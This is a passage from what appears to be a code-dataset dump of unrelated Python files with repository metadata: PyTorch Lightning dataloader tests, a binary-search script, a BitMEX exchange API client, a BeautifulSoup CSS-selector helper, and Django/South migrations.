    trainer.test(test_dataloaders=model.dataloader(train=False), ckpt_path=ckpt_path)

    assert len(trainer.val_dataloaders) == 1, \
        f'`val_dataloaders` not initiated properly, got {trainer.val_dataloaders}'
    assert len(trainer.test_dataloaders) == 1, \
        f'`test_dataloaders` not initiated properly, got {trainer.test_dataloaders}'
def test_train_inf_dataloader_error(tmpdir):
    """An infinite train dataloader with a fractional val_check_interval must raise."""
    model = EvalModelTemplate()
    model.train_dataloader = model.train_dataloader__infinite

    trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, val_check_interval=0.5)
    with pytest.raises(MisconfigurationException, match='infinite DataLoader'):
        trainer.fit(model)
def test_val_inf_dataloader_error(tmpdir):
    """An infinite val dataloader with a fractional limit_val_batches must raise."""
    model = EvalModelTemplate()
    model.val_dataloader = model.val_dataloader__infinite

    trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, limit_val_batches=0.5)
    with pytest.raises(MisconfigurationException, match='infinite DataLoader'):
        trainer.fit(model)
def test_test_inf_dataloader_error(tmpdir):
    """An infinite test dataloader with a fractional limit_test_batches must raise."""
    model = EvalModelTemplate()
    model.test_dataloader = model.test_dataloader__infinite

    trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, limit_test_batches=0.5)
    with pytest.raises(MisconfigurationException, match='infinite DataLoader'):
        trainer.test(model)
@pytest.mark.parametrize('check_interval', [50, 1.0])
def test_inf_train_dataloader(tmpdir, check_interval):
    """An infinite train dataloader works with step-based or full-epoch val checks."""
    model = EvalModelTemplate()
    model.train_dataloader = model.train_dataloader__infinite

    trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=1,
        val_check_interval=check_interval,
    )
    # training must complete successfully
    assert trainer.fit(model) == 1
@pytest.mark.parametrize('check_interval', [1.0])
def test_inf_val_dataloader(tmpdir, check_interval):
    """An infinite val dataloader works with a full-epoch val_check_interval."""
    model = EvalModelTemplate()
    model.val_dataloader = model.val_dataloader__infinite

    trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=1,
        val_check_interval=check_interval,
    )
    # training must complete successfully
    assert trainer.fit(model) == 1
def test_error_on_zero_len_dataloader(tmpdir):
    """A dataloader of length zero must be rejected with a ValueError."""
    model = EvalModelTemplate()
    model.train_dataloader = model.train_dataloader__zero_length

    # the empty loader is only detected once fit sets up the dataloaders
    with pytest.raises(ValueError):
        Trainer(
            default_root_dir=tmpdir,
            max_epochs=1,
            limit_train_batches=0.1,
            limit_val_batches=0.1,
            limit_test_batches=0.1,
        ).fit(model)
@pytest.mark.skipif(platform.system() == 'Windows', reason='Does not apply to Windows platform.')
@pytest.mark.parametrize('ckpt_path', [None, 'best', 'specific'])
@patch('pytorch_lightning.trainer.data_loading.multiprocessing.cpu_count', return_value=4)
def test_warning_with_few_workers(mock, tmpdir, ckpt_path):
    """Test that a warning is raised when dataloaders use too few workers.

    ``cpu_count`` is patched to 4 so that ``num_workers=0`` is always
    considered "too few", regardless of the machine running the test.
    """
    model = EvalModelTemplate()

    # every stage's loader deliberately uses zero workers to trigger the warning
    train_dl = model.dataloader(train=True)
    train_dl.num_workers = 0

    val_dl = model.dataloader(train=False)
    val_dl.num_workers = 0

    # BUGFIX: this previously re-assigned `train_dl` to a train=False loader,
    # silently discarding the real train loader built above and passing a
    # validation-split loader as both the train and the test dataloader.
    test_dl = model.dataloader(train=False)
    test_dl.num_workers = 0

    fit_options = dict(train_dataloader=train_dl,
                       val_dataloaders=val_dl)
    trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=1,
        limit_val_batches=0.1,
        limit_train_batches=0.2,
    )

    # fit model: expect one warning per under-provisioned loader
    with pytest.warns(
        UserWarning, match='The dataloader, train dataloader, does not have many workers which may be a bottleneck.'
    ):
        trainer.fit(model, **fit_options)

    with pytest.warns(
        UserWarning, match='The dataloader, val dataloader 0, does not have many workers which may be a bottleneck.'
    ):
        trainer.fit(model, **fit_options)

    if ckpt_path == 'specific':
        ckpt_path = trainer.checkpoint_callback.best_model_path
    test_options = dict(test_dataloaders=test_dl, ckpt_path=ckpt_path)
    with pytest.warns(
        UserWarning, match='The dataloader, test dataloader 0, does not have many workers which may be a bottleneck.'
    ):
        trainer.test(**test_options)
@pytest.mark.xfail(
    parse(torch.__version__) < parse("1.4.0"),
    reason="IterableDataset with __len__ before 1.4 raises",
)
def test_warning_with_iterable_dataset_and_len(tmpdir):
    """ Tests that a warning messages is shown when an IterableDataset defines `__len__`. """
    model = EvalModelTemplate()
    original_dataset = model.train_dataloader().dataset

    # wrap the template's dataset so it is iterable *and* reports a length;
    # that combination is what should trigger the warning
    class IterableWithLen(IterableDataset):
        def __iter__(self):
            return iter(original_dataset)

        def __len__(self):
            return len(original_dataset)

    dataloader = DataLoader(IterableWithLen(), batch_size=16)
    # sanity: the loader is detected both as sized and as iterable-backed
    assert _has_len(dataloader)
    assert _has_iterable_dataset(dataloader)
    trainer = Trainer(
        default_root_dir=tmpdir,
        max_steps=3,
    )
    # the warning must fire for train/val loaders during fit ...
    with pytest.warns(UserWarning, match='Your `IterableDataset` has `__len__` defined.'):
        trainer.fit(model, train_dataloader=dataloader, val_dataloaders=[dataloader])
    # ... and for test loaders during test
    with pytest.warns(UserWarning, match='Your `IterableDataset` has `__len__` defined.'):
        trainer.test(model, test_dataloaders=[dataloader])
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason='Test requires multiple GPUs')
def test_dataloader_reinit_for_subclass(tmpdir):
    """When adding a DistributedSampler, custom DataLoader subclasses must be
    re-instantiated as the same subclass with their extra attributes preserved."""

    # subclass with an extra constructor argument; positional order mirrors
    # torch.utils.data.DataLoader so re-instantiation by the trainer works
    class CustomDataLoader(torch.utils.data.DataLoader):
        def __init__(self, dataset, batch_size=1, shuffle=False, sampler=None,
                     batch_sampler=None, num_workers=0, collate_fn=None,
                     pin_memory=False, drop_last=False, timeout=0,
                     worker_init_fn=None, dummy_kwarg=None, **kwargs):
            super().__init__(dataset, batch_size, shuffle, sampler, batch_sampler,
                             num_workers, collate_fn, pin_memory, drop_last, timeout,
                             worker_init_fn)

            self.dummy_kwarg = dummy_kwarg

    trainer = Trainer(
        gpus=[0, 1],
        num_nodes=1,
        distributed_backend='ddp_spawn',
        default_root_dir=tmpdir,
    )

    # an object that merely looks like a dataloader must be passed through untouched
    class CustomDummyObj:
        sampler = None

    result = trainer.auto_add_sampler(CustomDummyObj(), train=True)
    assert isinstance(result, CustomDummyObj), "Wrongly reinstantiated data loader"

    # real subclass: the result must still be the subclass and keep its attribute
    dataset = list(range(1000))
    result = trainer.auto_add_sampler(CustomDataLoader(dataset), train=True)
    assert isinstance(result, torch.utils.data.DataLoader)
    assert isinstance(result, CustomDataLoader)
    assert hasattr(result, 'dummy_kwarg')

    # Shuffled DataLoader should also work
    result = trainer.auto_add_sampler(CustomDataLoader(list(range(1000)), shuffle=True), train=True)
    assert isinstance(result, torch.utils.data.DataLoader)
    assert isinstance(result, CustomDataLoader)
    assert hasattr(result, 'dummy_kwarg')

    class CustomSampler(torch.utils.data.Sampler):
        pass

    # Should raise an error if existing sampler is being replaced
    with pytest.raises(MisconfigurationException, match='DistributedSampler'):
        trainer.auto_add_sampler(
            CustomDataLoader(list(range(1000)), sampler=CustomSampler(list(range(1000)))), train=True)
class DistribSamplerCallback(Callback):
    """Callback asserting that DDP attaches a DistributedSampler to every
    dataloader: shuffled for training, unshuffled for val/test."""
    def on_train_start(self, trainer, pl_module):
        train_sampler = trainer.train_dataloader.sampler
        assert isinstance(train_sampler, DistributedSampler)
        assert train_sampler.shuffle
    def on_validation_start(self, trainer, pl_module):
        val_sampler = trainer.val_dataloaders[0].sampler
        assert isinstance(val_sampler, DistributedSampler)
        assert not val_sampler.shuffle
    def on_test_start(self, trainer, pl_module):
        test_sampler = trainer.test_dataloaders[0].sampler
        assert isinstance(test_sampler, DistributedSampler)
        assert not test_sampler.shuffle
@pytest.mark.skipif(platform.system() == 'Windows', reason='Does not apply to Windows platform.')
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason='Test requires multiple GPUs')
def test_dataloader_distributed_sampler(tmpdir):
    """ Test DistributedSampler and its arguments for DDP backend """
    model = EvalModelTemplate()
    # The DistribSamplerCallback (defined above) performs the actual
    # assertions inside the spawned DDP processes.
    trainer = Trainer(
        gpus=[0, 1],
        num_nodes=1,
        distributed_backend='ddp_spawn',
        default_root_dir=tmpdir,
        max_steps=1,
        callbacks=[DistribSamplerCallback()]
    )
    trainer.fit(model)
    trainer.test(ckpt_path=None)
@pytest.mark.skipif(torch.cuda.device_count() < 3, reason='Test requires multiple GPUs')
def test_batch_size_smaller_than_num_gpus(tmpdir):
    """Training must survive a last batch smaller than the number of GPUs,
    including the metric reduction over fewer-than-gpus outputs."""
    # we need at least 3 gpus for this test
    num_gpus = 3
    batch_size = 3
    class CurrentTestModel(EvalModelTemplate):
        def __init__(self, *args, **kwargs):
            super().__init__(*args, **kwargs)
            # batch norm doesn't work with batch size 1, we replace it
            self.c_d1_bn = torch.nn.ReLU()
        def training_step(self, *args, **kwargs):
            output = super().training_step(*args, **kwargs)
            loss = output['loss']
            # we make sure to add some metrics to the output dict,
            # this is essential for this test
            output['progress_bar'] = {'train_loss': loss}
            return output
        def train_dataloader(self):
            dataloader = super().train_dataloader()
            # construct a dataset with a size that is not divisible by num_gpus
            # therefore the last batch will have a size < num_gpus
            size = num_gpus * batch_size + (num_gpus - 1)
            dataset = Subset(dataloader.dataset, range(size))
            dataloader = DataLoader(
                dataset,
                batch_size=self.batch_size,
                drop_last=False,
            )
            return dataloader
    hparams = EvalModelTemplate.get_default_hparams()
    hparams['batch_size'] = batch_size
    model = CurrentTestModel(**hparams)
    trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=1,
        limit_train_batches=0.1,
        limit_val_batches=0,
        gpus=num_gpus,
    )
    # we expect the reduction for the metrics also to happen on the last batch
    # where we will get fewer metrics than gpus
    result = trainer.fit(model)
    assert 1 == result
@pytest.mark.parametrize('check_interval', [1.0])
def test_val_dataloader_not_implemented_error(tmpdir, check_interval):
    """Test not_implemented_error data loader (e.g. IterableDataset)"""
    model = EvalModelTemplate()
    # Swap in a val dataloader whose __len__ raises NotImplementedError,
    # emulating an infinite/iterable-style loader.
    model.val_dataloader = model.val_dataloader__not_implemented_error
    # logger file to get meta
    trainer = Trainer(
        default_root_dir=tmpdir,
        max_steps=5,
        max_epochs=1,
        val_check_interval=check_interval,
    )
    result = trainer.fit(model)
    # verify training completed
    assert result == 1
@pytest.mark.parametrize('check_interval', [50, 1.0])
def test_train_dataloader_not_implemented_error(tmpdir, check_interval):
    """Test not_implemented_error train data loader (e.g. IterableDataset)"""
    model = EvalModelTemplate()
    # Both train and val loaders raise NotImplementedError from __len__;
    # training must still complete with step-based (50) or fractional (1.0)
    # validation check intervals.
    model.train_dataloader = model.train_dataloader__not_implemented_error
    model.val_dataloader = model.val_dataloader__not_implemented_error
    trainer = Trainer(
        default_root_dir=tmpdir,
        max_steps=5,
        max_epochs=1,
        val_check_interval=check_interval
    )
    result = trainer.fit(model)
    # verify training completed
    assert result == 1
def test_train_dataloader_not_implemented_error_failed(tmpdir):
    """An infinite train dataloader combined with a fractional
    ``val_check_interval`` must raise a MisconfigurationException."""
    template = EvalModelTemplate()
    template.train_dataloader = template.train_dataloader__not_implemented_error
    trainer = Trainer(
        default_root_dir=tmpdir,
        max_steps=5,
        max_epochs=1,
        val_check_interval=0.5,
    )
    with pytest.raises(MisconfigurationException, match='infinite DataLoader'):
        trainer.fit(template)
def test_val_dataloader_not_implemented_error_failed(tmpdir):
    """An infinite *val* dataloader combined with a fractional
    ``limit_val_batches`` must raise a MisconfigurationException."""
    template = EvalModelTemplate()
    template.val_dataloader = template.val_dataloader__not_implemented_error
    trainer = Trainer(
        default_root_dir=tmpdir,
        max_steps=5,
        max_epochs=1,
        limit_val_batches=0.5,
    )
    with pytest.raises(MisconfigurationException, match='infinite DataLoader'):
        trainer.fit(template)
def test_test_dataloader_not_implemented_error_failed(tmpdir):
    """An infinite *test* dataloader combined with a fractional
    ``limit_test_batches`` must raise a MisconfigurationException."""
    template = EvalModelTemplate()
    template.test_dataloader = template.test_dataloader__not_implemented_error
    trainer = Trainer(
        default_root_dir=tmpdir,
        max_steps=5,
        max_epochs=1,
        limit_test_batches=0.5,
    )
    with pytest.raises(MisconfigurationException, match='infinite DataLoader'):
        trainer.test(template)
| [
"noreply@github.com"
] | scarecrow1123.noreply@github.com |
b1a6ae217e2b8adfa46ab725eabf7af800362709 | 256b02688ffce4b5a1fd009bc9eb3d8b3dc4a21b | /02/litianzeng/binary_search.py | c7dfa345f2c6a163a9fd392abb94084cf84351e7 | [] | no_license | yyuan9/actual_06_homework_mage | 72324ddd7a8c45233f7bb07245cfa2f06091f014 | 3bb81d2d5478cee52e56f4180dabcecba3c7eeb9 | refs/heads/master | 2020-05-13T03:11:15.257388 | 2017-08-18T07:33:22 | 2017-08-18T07:33:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | #encodinf:utf-8
def binary_search(nums, target):
    """Classic binary search over a sorted list.

    Returns the index of `target` in `nums`, or -1 when absent.
    With duplicate values, any matching index may be returned.
    """
    low, high = 0, len(nums) - 1
    while low <= high:
        mid = (low + high) // 2
        if nums[mid] < target:
            low = mid + 1
        elif nums[mid] > target:
            high = mid - 1
        else:
            return mid
    return -1


def main():
    """Prompt for a number and report its index in the sorted sample list."""
    list_nums = [6, 3, 2, 6, 9, 11, 15, 17, 20, 26, 9, 38, 45, 69, 50, 55, 61, 68, 73]
    list_nums.sort()
    find_nums = int(input('数据为{list}\n输入你想查找的数字:'.format(list=list_nums)))
    idx = binary_search(list_nums, find_nums)
    if idx >= 0:
        print('查找的数字{0}索引位置为{1}'.format(find_nums, idx))
    else:
        # The original code pre-checked membership with a linear `in` scan,
        # defeating the purpose of binary search; absence is now detected
        # by the search itself.
        print('请输入在', list_nums, '中存在的数字')


if __name__ == '__main__':
    main()
| [
"ltz150@163.com"
] | ltz150@163.com |
135e991bc86f84ddffd73260ec00cc4abd128f28 | 5406907c05b12e6e94d19d871960a946252018bf | /backend/src/members/migrations/0002_alter_members_rank.py | ba85dde5613228b6981dba6a282b431e82579de2 | [
"MIT"
] | permissive | kfriden/HouseOfTric | 3a22e8bcc5934a56cc36d160f371a4a90fb47668 | b32fca5dd2045b158f73530109616e6eca984158 | refs/heads/master | 2023-09-01T06:26:04.522987 | 2021-11-05T00:15:02 | 2021-11-05T00:15:02 | 387,297,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | # Generated by Django 3.2.6 on 2021-08-25 01:57
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration: redefine ``Members.rank`` as a plain
    CharField with max_length=120."""
    dependencies = [
        ('members', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='members',
            name='rank',
            field=models.CharField(max_length=120),
        ),
    ]
| [
"kfriden@verizon.net"
] | kfriden@verizon.net |
9c3e255d923da6dcf06005d708128fcebe7dc196 | 99136b42e06baacc569c318494af2a1899771534 | /bitmex_basic.py | fdd64fc2124d8f2c777f6a9f651e5ed31cefbb5d | [] | no_license | Elder89/bitmex_trade | 901c621a672d5f14f18c09ef247eb778097fc805 | 258982e4f9e33922fc02208ce25cc6ff4bdb5061 | refs/heads/master | 2021-08-16T23:52:25.280391 | 2017-11-20T14:24:49 | 2017-11-20T14:24:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,632 | py | from requests.auth import AuthBase
import requests
from time import sleep
import json
import math
import uuid
from time import sleep
import time
import hmac
import hashlib
import urllib.request
import sys
import os
import urllib.parse as urlparse
import base64
class APIKeyAuthWithExpires(AuthBase):
    """requests auth hook that signs BitMEX calls with an API key.

    Uses an ``api-expires`` timestamp instead of a nonce, so multiple
    processes sharing the same key cannot collide on request ordering.
    For the scheme details see https://www.bitmex.com/app/apiKeys
    """

    def __init__(self, apiKey, apiSecret):
        """Store the credentials used for signing."""
        self.apiKey = apiKey
        self.apiSecret = apiSecret

    def __call__(self, r):
        """Attach api-key / api-expires / api-signature headers to `r`."""
        # 5s grace period in case of clock skew.
        expires = int(round(time.time()) + 5)
        r.headers['api-expires'] = str(expires)
        r.headers['api-key'] = self.apiKey
        r.headers['api-signature'] = self.generate_signature(self.apiSecret, r.method, r.url, expires, r.body or '')
        return r

    def generate_signature(self, secret, verb, url, nonce, data):
        """Return the hex HMAC-SHA256 over verb + path(+query) + nonce + data."""
        parsedURL = urlparse.urlparse(url)
        path = parsedURL.path
        if parsedURL.query:
            path = path + '?' + parsedURL.query
        payload = bytes(verb + path + str(nonce) + data, "utf-8")
        return hmac.new(secret.encode("UTF-8"), payload, digestmod=hashlib.sha256).hexdigest()
class BitMEX(object):
    """Minimal BitMEX REST API connector.

    Wraps the endpoints needed for simple market making: balance, order
    book, order placement/cancellation, position queries.  Requests are
    signed with the api-key/api-expires/api-signature (HMAC-SHA256) scheme.
    """

    def __init__(self, symbol=None, apiKey=None, apiSecret=None, base_uri='https://www.bitmex.com/api/v1/'
                 , orderIDPrefix='mm_bitmex_'):
        """Init connector.

        symbol           -- instrument symbol, e.g. 'XBTUSD'
        apiKey/apiSecret -- BitMEX API credentials (optional for public data)
        base_uri         -- REST root (production or testnet)
        orderIDPrefix    -- prefix for generated clOrdIDs (max 13 chars)
        """
        self.base_uri = base_uri
        self.symbol = symbol
        self.apiKey = apiKey
        self.apiSecret = apiSecret
        if len(orderIDPrefix) > 13:
            raise ValueError("settings.ORDERID_PREFIX must be at most 13 characters long!")
        self.orderIDPrefix = orderIDPrefix
        # Reuse one HTTPS session so connection pooling / keep-alive applies.
        self.session = requests.Session()

    def get_json_secret_data(self, path, postdict=None, verb=None):
        """GET `path` via urllib with API-key signing; return parsed JSON.

        Exits the process on HTTP or JSON-decoding errors (best-effort CLI
        behavior, kept from the original).
        """
        if not verb:
            verb = 'POST' if postdict else 'GET'
        expires = int(time.time())
        url = self.base_uri + path
        # Fix: sign the *full* request path (e.g. '/api/v1/user/margin') with
        # HMAC-SHA256, matching APIKeyAuthWithExpires.generate_signature.  The
        # previous version signed only the relative path with SHA-512, which
        # does not match BitMEX's documented signature scheme.
        parsedURL = urlparse.urlparse(url)
        sig_path = parsedURL.path
        if parsedURL.query:
            sig_path = sig_path + '?' + parsedURL.query
        message = bytes(verb + sig_path + str(expires) + '', "utf-8")
        try:
            signing = hmac.new(self.apiSecret.encode("UTF-8"), message, digestmod=hashlib.sha256).hexdigest()
            headers = {'api-signature': signing, 'api-key': self.apiKey, 'api-expires': str(expires)}
            res = urllib.request.Request(url, headers=headers)
            data = json.loads(urllib.request.urlopen(res).read())
            return data
        except urllib.error.HTTPError as e:
            print('HTTPError: ', e)
            sys.exit(1)
        except json.JSONDecodeError as e:
            print('JSONDecodeError: ', e)
            sys.exit(1)

    def _curl_bitmex(self, path, query=None, postdict=None, timeout=3, verb=None):
        """Send a request to BitMEX servers; retry on 401/503/timeouts."""
        url = self.base_uri + path
        # Default to POST if data is attached, GET otherwise.
        if not verb:
            verb = 'POST' if postdict else 'GET'
        # Fix: `auth` must always be bound; previously an unauthenticated
        # call (no apiKey) raised NameError below.
        auth = None
        if self.apiKey:
            auth = APIKeyAuthWithExpires(self.apiKey, self.apiSecret)
        try:
            req = requests.Request(verb, url, data=postdict, auth=auth, params=query)
            prepped = self.session.prepare_request(req)
            response = self.session.send(prepped, timeout=timeout)
            # Make non-200s throw.
            response.raise_for_status()
        except requests.exceptions.HTTPError as e:
            # 401 - Auth error. Re-auth and re-run this request.
            if response.status_code == 401:
                print("Token expired, reauthenticating...")
                sleep(1)
                return self._curl_bitmex(path, query, postdict, timeout, verb)
            # 404, can be thrown if order canceled does not exist.
            elif response.status_code == 404:
                if verb == 'DELETE':
                    print("Order not found: %s" % postdict['orderID'])
                    return
                print("Unable to contact the BitMEX API (404). " +
                      "Request: %s \n %s" % (url, json.dumps(postdict)))
                exit(1)
            # 503 - BitMEX temporary downtime, likely due to a deploy. Try again.
            elif response.status_code == 503:
                print("Unable to contact the BitMEX API (503), retrying. " +
                      "Request: %s \n %s" % (url, json.dumps(postdict)))
                sleep(1)
                return self._curl_bitmex(path, query, postdict, timeout, verb)
            # Unknown Error
            else:
                print("Unhandled Error:", e, response.text)
                print("Endpoint was: %s %s" % (verb, path))
                exit(1)
        except requests.exceptions.Timeout as e:
            # Timeout, re-run this request.
            print("Timed out, retrying...")
            return self._curl_bitmex(path, query, postdict, timeout, verb)
        except requests.exceptions.ConnectionError as e:
            print("Unable to contact the BitMEX API (ConnectionError). Please check the URL. Retrying. " +
                  "Request: %s \n %s" % (url, json.dumps(postdict)))
            sleep(1)
            return self._curl_bitmex(path, query, postdict, timeout, verb)
        return response.json()

    def funds(self):
        """Get your current balance (user/margin endpoint)."""
        return self._curl_bitmex(path="user/margin")

    def market_depth(self, depth=10):
        """Get market depth / orderbook for `self.symbol`, `depth` levels."""
        path = "orderBook"
        return self._curl_bitmex(path=path, query={'symbol': self.symbol, 'depth': depth})

    def buy(self, quantity, price=None):
        """Place a buy order; market order when `price` is None.

        Fix: the previous version always forwarded price=None, silently
        turning every limit buy into a market order.
        """
        return self.place_order(quantity, price)

    def sell(self, quantity, price=None):
        """Place a sell order; market order when `price` is None."""
        return self.place_order(-quantity, price)

    def place_order(self, quantity, price):
        """Place an order (negative quantity sells). Returns the order object."""
        endpoint = "order"
        # Generate a unique clOrdID with our prefix so we can identify it.
        clOrdID = self.orderIDPrefix + base64.b64encode(uuid.uuid4().bytes).decode('utf8').rstrip('=\n')
        postdict = {
            'symbol': self.symbol,
            'quantity': quantity,
            'price': price,
            'clOrdID': clOrdID
        }
        return self._curl_bitmex(path=endpoint, postdict=postdict, verb="POST")

    def cancel(self, orderID):
        """Cancel an existing order by its orderID."""
        path = "order"
        postdict = {
            'orderID': orderID,
        }
        return self._curl_bitmex(path=path, postdict=postdict, verb="DELETE")

    def closeAllPosition(self, price=None):
        """Close the whole position; market close when `price` is None."""
        path = "order/closePosition"
        postdict = {
            'symbol': self.symbol,
            'price': price,
        }
        return self._curl_bitmex(path=path, postdict=postdict, verb="POST")

    def position(self):
        """Return the list of currently open positions ([] when none)."""
        position_json = self._curl_bitmex(path="position")
        return [position for position in position_json if position['isOpen'] == True]

    def wallet(self):
        """Return the margin balance in XBT.

        marginBalance is presumably reported in satoshi, hence the division
        by 100,000,000 - confirm against the walletSummary schema.
        """
        return self._curl_bitmex(path="user/walletSummary")[-1]['marginBalance'] / 100000000
#bit_mex = BitMEX(symbol='XBTUSD', apiKey=os.environ["API_TEST_KEY"], apiSecret=os.environ["API_TEST_SECRET"], base_uri='https://testnet.bitmex.com/api/v1/')
#print(bit_mex.wallet())
| [
"h.s.298355@gmail.com"
] | h.s.298355@gmail.com |
7851381b34746f3487ce259477ca9681dcb2349a | 32cfd6a8df9b24059ed7bee0b7bf99b6c0268f6e | /framework/seocortex/utils/soupselect_old.py | 2498bc8d37f106ed475746dca6bdd246a3d6be44 | [] | no_license | blorenz/seocortex | 5cd7acb647fbc4908e6045d2a89bdd2ade922434 | 3f1f7e8ac4a12e24e7f2cb58407ce52babfe5cf8 | refs/heads/master | 2016-09-05T21:36:01.039128 | 2012-04-23T13:33:46 | 2012-04-23T13:33:46 | 3,951,299 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 4,621 | py | # -*-coding:Utf-8 -*
# Copyright 2012 - Peoplze.com <contact@peoplze.com>
# Python imports
import re
def attrInNode(node, atr):
    """Return True if the tag `node` carries an attribute named `atr`.

    `node.attrs` is expected to be an iterable of (name, value) pairs.
    """
    return any(key == atr for key, _ in node.attrs)
def htmlFind(node, selector, n, defaut=""):
    """Return the text of the n-th element matching `selector` under `node`,
    or `defaut` when fewer than n+1 elements match."""
    matches = list(node.findSelect(selector))
    return matches[n].text if len(matches) > n else defaut
# Matches a plain tag token, e.g. 'div' or 'h1' (lowercase ASCII letters/digits).
tag_re = re.compile('^[a-z0-9]+$')
# Parses an attribute-selector token such as 'a[href^="http"]' into the
# named groups: tag (optional), attribute, operator and value.
attribselect_re = re.compile(
    r'^(?P<tag>\w+)?\[(?P<attribute>\w+)(?P<operator>[=~\|\^\$\*]?)' +
    r'=?"?(?P<value>[^\]"]*)"?\]$'
)
# /^(\w+)\[(\w+)([=~\|\^\$\*]?)=?"?([^\]"]*)"?\]$/
#   \---/  \---/\-------------/    \-------/
#     |      |         |               |
#     |      |         |           The value
#     |      |    ~,|,^,$,* or =
#     |   Attribute
#    Tag
def attribute_checker(operator, attribute, value=''):
    """
    Takes an operator, attribute and optional value; returns a predicate
    returning True for elements matching that combination (CSS attribute
    selector semantics).
    """
    def exact(el):
        return el.get(attribute) == value

    def word(el):
        # attribute includes value as one of a set of space separated tokens
        return value in el.get(attribute, '').split()

    def prefix(el):
        return el.get(attribute, '').startswith(value)

    def suffix(el):
        return el.get(attribute, '').endswith(value)

    def contains(el):
        return value in el.get(attribute, '')

    def dash_match(el):
        # attribute is either exactly value or starts with value-
        current = el.get(attribute, '')
        return current == value or current.startswith('%s-' % value)

    checkers = {
        '=': exact,
        '~': word,
        '^': prefix,
        '$': suffix,
        '*': contains,
        '|': dash_match,
    }
    # No operator: simple existence test (BeautifulSoup 3 has_key API).
    return checkers.get(operator, lambda el: el.has_key(attribute))
def has_attr(soup, attr_name):
    """Return True if the BeautifulSoup tag `soup` has attribute `attr_name`.

    Relies on the BeautifulSoup 3 internal ``_getAttrMap`` helper.
    """
    return attr_name in soup._getAttrMap()
def select(soup, selector):
    """
    soup should be a BeautifulSoup instance; selector is a CSS selector
    specifying the elements you want to retrieve.

    Tokens are processed left to right, narrowing `current_context` (the
    list of candidate elements) at each step. Supported token forms:
    attribute selectors (tag[attr<op>value]), #id, tag.class, '*', and
    plain tag names. An unrecognised token yields [].
    """
    tokens = selector.split()
    current_context = [soup]
    for token in tokens:
        m = attribselect_re.match(token)
        if m:
            # Attribute selector
            tag, attribute, operator, value = m.groups()
            if not tag:
                tag = True
            checker = attribute_checker(operator, attribute, value)
            found = []
            for context in current_context:
                found.extend([el for el in context.findAll(tag) if checker(el)])
            current_context = found
            continue
        if '#' in token:
            # ID selector
            tag, id = token.split('#', 1)
            if not tag:
                tag = True
            # IDs are unique, so only the first context is searched.
            el = current_context[0].find(tag, {'id': id})
            if not el:
                return [] # No match
            current_context = [el]
            continue
        if '.' in token:
            # Class selector
            tag, klass = token.split('.', 1)
            if not tag:
                tag = True
            # Multiple classes ('a.b.c') must all be present on the element.
            classes = set(klass.split('.'))
            found = []
            for context in current_context:
                found.extend(
                    context.findAll(tag,
                        {'class': lambda attr:
                            attr and classes.issubset(attr.split())}
                    )
                )
            current_context = found
            continue
        if token == '*':
            # Star selector
            found = []
            for context in current_context:
                found.extend(context.findAll(True))
            current_context = found
            continue
        # Here we should just have a regular tag
        if not tag_re.match(token):
            return []
        found = []
        for context in current_context:
            found.extend(context.findAll(token))
        current_context = found
    return current_context
def monkeypatch(BeautifulSoupClass=None):
    """
    Attach the `findSelect` / `has_attr` helpers onto the given soup class.
    If you don't explicitly state the class to patch, defaults to
    BeautifulSoup's `Tag` so every node in a parsed tree can be queried.
    """
    if not BeautifulSoupClass:
        # Patching Tag (rather than BeautifulSoup) is more convenient: the
        # helpers become available on every element, not just the root.
        from BeautifulSoup import Tag as BeautifulSoupClass
    for name, helper in (('findSelect', select), ('has_attr', has_attr)):
        setattr(BeautifulSoupClass, name, helper)
def unmonkeypatch(BeautifulSoupClass=None):
    """Undo `monkeypatch`: strip the injected helpers from the class
    (defaults to BeautifulSoup's `Tag`)."""
    if not BeautifulSoupClass:
        from BeautifulSoup import Tag as BeautifulSoupClass
    for injected in ('findSelect', 'has_attr'):
        delattr(BeautifulSoupClass, injected)
# Monkeypatch on import: every Tag gains findSelect/has_attr as a side effect
# of importing this module.
monkeypatch()
| [
"blorenz@gmail.com"
] | blorenz@gmail.com |
3c0aa37db19014c3b157d9ace989b76bf437a1de | 529bb3ed31da78d1818e387d209fb2e783f14c4b | /blog/migrations/0002_add_thumbnail.py | ba65352ecb458a3776bc3337e20246c6b7c70725 | [] | no_license | bendavis78/django-simpleblog | 773c81dc6fe0bf6f95503cfc39acec77ff4d95c7 | f75a8a369615106d2a9bb02fe383e32f46b5943b | refs/heads/master | 2016-09-06T06:18:33.709241 | 2011-06-03T04:47:27 | 2011-06-03T04:47:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,854 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: add the optional ``thumbnail`` ImageField to
    ``blog.Post``."""
    def forwards(self, orm):
        # Adding field 'Post.thumbnail'
        db.add_column('blog_post', 'thumbnail', self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True), keep_default=False)
    def backwards(self, orm):
        # Deleting field 'Post.thumbnail'
        db.delete_column('blog_post', 'thumbnail')
    # Frozen ORM snapshot used by South to build the fake model classes.
    models = {
        'blog.category': {
            'Meta': {'object_name': 'Category'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
        },
        'blog.post': {
            'Meta': {'object_name': 'Post'},
            'body': ('django.db.models.fields.TextField', [], {}),
            'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['blog.Category']", 'null': 'True', 'blank': 'True'}),
            'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
